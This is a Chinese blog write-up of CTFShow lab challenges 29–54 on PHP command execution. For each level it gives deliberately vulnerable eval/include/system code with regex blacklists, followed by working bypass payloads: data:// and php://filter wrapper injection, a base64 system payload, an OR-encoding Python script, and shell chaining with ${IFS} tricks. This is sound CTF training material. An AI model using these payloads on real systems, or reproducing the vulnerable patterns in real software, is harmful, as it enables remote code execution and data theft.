CTFShow-命令执行(29-54)

已于 2025-03-26 11:10:05 修改
阅读量559 收藏 21
点赞数 8
文章标签: web安全 网络 安全 系统安全 网络攻击模型 计算机网络 网络安全
于 2024-10-13 12:07:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pythonZLX/article/details/142896389
版权

前情提示

代码执行函数:

1- eval()

特别注意:php中@是干什么的

2- assert() --(最好不要加上分号作为结尾)

3- call_user_func()

4- create_function()

5- array_map()

6- call_user_func_array()

7- array_filter()

8- uasort()函数

9- preg_replace()

命令执行函数:

1- system()

system("ls");

2-passthru()

passthru("ls");

3- exec()

需要输出执行结果,且它只会输出最后一行的内容。

echo exec("ls");

4- pcntl_exec()

5- shell_exec()

需要输出执行结果,且输出全部的内容。

echo shell_exec("ls");

6- popen()/proc_open()

7- 反引号 ``

echo `ls`;

Web29

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤掉了flag

ls查看以下文件

直接使用 cat fla*即可

web30

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤掉了最常用的命令执行函数system

使用其他命令执行函数进行绕过

payload:

?c=passthru("cat fla*");

Web31

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

本关对cat函数和空格 点 单引号进行了过滤

按照情况来对其一一过滤

payload:

?c=passthru("tac%09fla*");

Web32

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);

本关新增过滤了分号,括号

在eval函数中不止用分号结尾,也可以 ?>

eval("echo 1;");
eval("echo 1?>");

但考虑到过滤了括号和反引号,所以这里不能使用任何命令执行函数了

考虑文件包含

?c=include$_GET[2]?>&2=data://text/plain,<?php system("cat flag")?>
?c=include$_GET[2]?>&2=php://filter/read=convert.base64-encode/resource=flag.php

首先使用c参数来设置包含值,包含内容为GET传进来的2参数,然后拼接2参数使用data协议来直接执行命令

或者phpfilter 来包含flag.php。因为2是我们自己定义的新参数所以不在代码的检测内容之中可以放心搞

Web33

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

照比32关多过滤了一个双引号

无伤大雅,与32关同理

?c=include$_GET[2]?>&2=data://text/plain,<?php system("cat flag.php");?>

Web34

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

同理33

?c=include$_GET[2]?>&2=data://text/plain,<?php system("cat flag.php");?>
?c=include$_GET[2]?>&2=php://filter/read=convert.base64-encode/resource=flag.php

Web35

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

同34

?c=include$_GET[2]?>&2=data://text/plain,<?php system("cat flag.php");?>
?c=include$_GET[2]?>&2=php://filter/read=convert.base64-encode/resource=flag.php

Web36

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

本关照比之前多了一个数字过滤 / 过滤

只需要将原来payload中包含的get参数换成字母的就好了

?c=include$_GET[p]?>&p=data://text/plain,<?php system("cat flag.php");?>

Web37

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

有改动但不多

要求是包含进flag文件才可以

我们直接伪协议通杀,注意伪协议中不能有flag! 所以需要base64编码

将命令执行部分<?php system("cat flag.php");?>进行编码

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

组合一下就是新payload:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

Web38

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

本关本意是过滤掉php开头的伪协议以及以及file读取,但是与我们data协议无关

37关payload拿来就用

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

Web39

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

本关照比之前进行改动,主要是强行加入php后缀

但是仍然可以使用data协议

?c=data://text/plain,<?php%20system("tac fla*.php");?>

因为?>为php的结束符号后面拼接的.php会被忽略掉,不用管

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

Web40

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
​
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

无符号RCE

这里注意一点细节,就是过滤的括号是中文的括号!不要被吓到!

步骤:

1、localeconv() 返回一包含本地数字及货币格式信息的数组但是这个需要取第一个数组值,[]被过滤

2、使用这三个函数将localeconv括起来

  • current() 函数返回数组中的当前元素(单元),默认取第一个值,

  • pos() 同 current() ,是current()的别名

  • reset() 函数返回数组第一个单元的值,如果数组为空则返回 FALSE

3、使用scandir打印一下当前目录所有内容

print_r(scandir(.)); 即可打印所有内容 更改一下就是

print_r(scandir(pos(localeconv())));

4、打印出flag 使用next函数,输出数组中的当前元素的下一个元素的值,也就是可以输出第二个

我们默认当前元素肯定是0,所以输出的下一个元素是1的内容,但是根据显示我们发现flag.php在2号位置,所以我们需要对该数组进行一下置换,让3变成0,2变成1颠倒一下

5、使用array_reverse函数进行颠倒

6、使用highlight_file进行高亮显示,显示出源代码内容

所以最终显示flag的payload:

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

Web41

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
​
*/
​
if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

本关需要使用python脚本,可以看到过滤的符号中缺少 | 符号,通过除了以上符号外的任意符号的ascii码进行或操作最终得到需要的值

import re
import requests
​
url="http://67e43a48-b511-4fcd-b715-74df05737fd1.challenge.ctf.show:8080"
​
a=[]
ans1=""
ans2=""
for i in range(0,256):
    c=chr(i)
    tmp = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-',c, re.I)
    if(tmp):
        continue
        #print(tmp.group(0))
    else:
        a.append(i)
​
# eval("echo($c);");
mya="system"  #函数名 这里修改!
myb="ls"      #参数
def myfun(k,my):
    global ans1
    global ans2
    for i in range (0,len(a)):
        for j in range(i,len(a)):
            if(a[i]|a[j]==ord(my[k])):
                ans1+=chr(a[i])
                ans2+=chr(a[j])
                return;
for k in range(0,len(mya)):
    myfun(k,mya)
data1="(\""+ans1+"\"|\""+ans2+"\")"
ans1=""
ans2=""
for k in range(0,len(myb)):
    myfun(k,myb)
data2="(\""+ans1+"\"|\""+ans2+"\")"
​
data={"c":data1+data2}
r=requests.post(url=url,data=data)
print(r.text)

Web42

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

本关主要内容是,将输出的结果丢进linux黑洞中不进行显示

输入?c=ls 是不显示的

可以使用分号进行分割分化来进行绕过?c=ls;ls

如此一来整个命令就变成了 ls;ls >/dev/null 2>&1

第一个ls会正常显示出来,而第二个ls因为分号的问题会被系统认为是第二个命令,所以命令会丢进黑洞中将第一个显示出来

最终payload:

?c=tac flag.php;ls

Web43

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

照比上一关过滤了分号和cat 不过无所谓

; //分号 | //只执行后面那条命令 || //只执行前面那条命令 & //两条命令都会执行 && //两条命令都会执行

cat过滤了就tac 分号过滤了就双管道符

所以最终payload:

?c=tac flag.php || ls

Web44

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多过滤了一个flag,无所谓直接*号就行

最终payload:

?c=tac fla*||ls

Web45

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多过滤了一个空格

%09绕过

最终payload为:

?c=tac%09fla*||ls

Web46

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

不能有数字不能有*号不能有$号

一个个来,

1、不能有*就用?区别是?代表一位

*代表多位任意位

2、不能有数字也可以直接%09,09解码后不是数字,所以这个过滤完全就是唬人的

所以最终payload为:?c=tac%09fla?.php||ls

Web47

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多了一堆没用的过滤,上一关payload可以直接干死

最终payload:?c=tac%09fla?.php||ls

Web48

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

无用过滤,直接通杀

payload:?c=tac%09fla?.php||ls

Web49

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

通杀payload:?c=tac%09fla?.php||ls

Web50

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了很多东西,这回肯定是不能用空格了,所以需要使用一个不带空格的读取命令 nl

注意nl不支持通配符,所以需要使用一个linux特性功能就是两个单引号分割字符串中间自动忽略

最终payload:

nl<fla''g.php||ls

Web51

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多过滤了一个tac命令

仍然可以继续使用nl命令进行通杀

nl<fla''g.php||ls

Web52

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了尖括号,那我们也可以绕过

使用${IFS}等等进行绕过

?c=nl${IFS}fla''g.php||ls

但是发现没有flag,我们尝试取根目录查看一手

重新修正payload:

/?c=ca\t${IFS}/fla?||ls

Web53

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 18:21:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}
​

payload:?c=ca\t${IFS}fla?.php

Web54

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:43:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
​
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

丧心病狂的过滤

绕过方法:

没有过滤mv指令,可以通过mv将flag文件重命名然后url查看

先ls查看当前目录是否存在flag文件

然后mv更改flag.php文件名

最后在url后面拼接修改的文件名

payload:

?c=ls

?c=mv${IFS}fla?.php${IFS}z.txt

?c=ls

https://2ff97d35-4afa-47ac-b824-67f7f93cd213.challenge.ctf.show/z.txt

ctfshow——命令执行
qq_55202378的博客
02-07 1075
这里对c参数的过滤比较严谨,可以考虑将代码写到其他参数中。调用其他代码执行函数,如。也可以使用反撇号代替。
2024年网安最全ctfshow-web-命令执行
2401_84264610的博客
05-01 311
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
CTFshow-命令执行
weixin_44770698的博客
06-25 3439
ctfshow-web 命令执行
CTFShow-命令执行
qq_66013948的博客
09-16 2032
​ 过滤了文件关键词,通配符绕过,cat f*,用system执行,发现没有成功读取,考虑使用tac倒序读取,得到flag。​。
ctfshow-命令执行
m0_72125469的博客
09-10 1965
方法3 比较经典 这是一个上传文件的模版 向指定url的服务器上传文件 然后服务器会自动将上传的文件放置指定目录 在linux里面临时存放文件的目录可能会被定时删除 这个目录是/tmp,然后一般网页文件会命名为php?因为,${RANDOM}可以出现4或5,可以构造/?echo $((${##}${##}+${##}${##}+${##}${##}+${##}+${##}+${##})) 也是36。
网络安全最全ctfshow-web-命令执行
2401_84301922的博客
05-04 364
localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以。的url编码,适用php7。②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入。scandir():遍历目录,这里因为参数为"."所以遍历当前目录。④利用参数输入+include+伪协议(不用括号、分号)pos():输出数组第一个元素,不改变指针。其他的过滤了无所谓,但过滤了.和空格。
ctfshow-web入门系列-命令执行-web29-web36
最新发布
m0_74416116的博客
09-27 2109
ctfshow 命令执行入门学习
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp
2401_84281698的博客
05-12 1048
c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。php://filter/read=convert.base64-encode/resource=flag.php #伪协议。
ctfshow-web-命令执行
xunyue88的博客
02-19 634
localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以。eval了GET的参数,没过滤就system执行,但是匹配到大小写的flag就不执行。①其实就是highlight_file(flag.php);②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入。scandir():遍历目录,这里因为参数为"."所以遍历当前目录。
CTFshow——命令执行
lee_maple的博客
04-23 5736
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
ctfshow命令执行
m0_64987233的博客
08-11 154
看题目过滤了什么而选择。
CTFshow命令执行
potatojiang的博客
08-04 653
所以我们现在的问题就是如何把system(cat flag.php) 参数为数字,又能将参数转化为字符串的函数,首先考虑hex2bin,但这个函数不在白名单中,我们需要现将这个函数转换为数字。然后,我们需要得到'_GET',我们先将'_GET'转换为16进制,再换为10进制,为什么这样做,因为16进制里面有x,这样会匹配到正则的第一项。${PATH:~A}${PWD:~A}表示的就是PATH的最后一个单词和PWD的最后一个单词,组合起来就是nl。这里的<A的作用是让上一次的执行结果错误,返回1,使得$?
ctfshow 命令执行
m0_74097148的博客
05-21 4343
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
CTFSHOW 命令执行
asmartrman的博客
09-27 2420
ctfshow-web入门-命令执行板块(持续更新)
CTFshow 命令执行
xian653617125的博客
05-16 775
web 39 看代码是过滤了输入的限制,不能输flag,我们可以在include里面利用伪协议data://text/plain,后面的语句会被当做php代码来执行,因为我们在前面已经闭合了php的代码所有后面的.php并不影响(但我不太懂.php会被怎么样,请师傅们帮我解解惑) 如图所示 .php直接被显示到了页面上,我们也得到了flag的文件名,然后我们利用system执行命令 最后就可以得到flag了,但是记得因为过滤了flag所以我们用?来代替一个字符。 web40 过滤了 ...
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值